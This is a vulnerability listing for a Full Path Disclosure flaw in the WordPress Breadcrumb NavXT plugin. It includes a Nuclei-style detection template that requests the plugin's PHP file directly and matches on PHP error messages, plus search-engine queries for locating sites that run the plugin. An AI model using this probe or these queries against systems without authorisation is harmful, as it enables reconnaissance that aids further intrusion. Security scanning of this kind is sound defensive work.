漏洞描述
The Breadcrumb NavXT plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
wp-breadcrumb-navxt-fpd: WordPress Breadcrumb NavXT - Full Path Disclosure
PoC代码[已公开]
id: wp-breadcrumb-navxt-fpd
info:
name: WordPress Breadcrumb NavXT - Full Path Disclosure
author: theamanrawat
severity: low
description: |
The Breadcrumb NavXT plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
max-request: 1
verified: false
publicwww-query: "/wp-content/plugins/breadcrumb-navxt/"
fofa-query: body="/wp-content/plugins/breadcrumb-navxt/"
tags: wordpress,wp,wp-plugin,fpd,breadcrumb-navxt
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/breadcrumb-navxt.php"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
- 'status_code == 200 || status_code == 500'
- 'contains(body, "breadcrumb-navxt")'
condition: and
# digest: 4b0a00483046022100e6314efccab2084ecca8938d6c1b3d1c6ef514d1318d8f57b66a95b90e82551b0221008bb289d4cd3d996e99d0db5a4f39078fc544f1ef6e00c96bd56c5b45d9bdef85:922c64590222798bb761d5b6d8e72950